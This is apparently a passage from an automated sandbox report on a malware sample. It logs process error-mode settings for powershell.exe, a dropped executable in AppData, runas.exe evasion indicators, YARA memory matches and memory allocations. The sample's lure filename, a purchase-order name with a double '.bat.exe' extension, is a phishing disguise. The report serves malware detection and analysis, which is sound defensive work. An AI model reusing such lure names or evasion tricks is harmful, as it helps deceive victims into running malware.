                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Pre Alert PO TVKJEANSA00967.bat.exe PID: 7480, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: STiokuWkiGFJ.exe PID: 8064, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: 8FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: A1D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeMemory allocated: B1D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
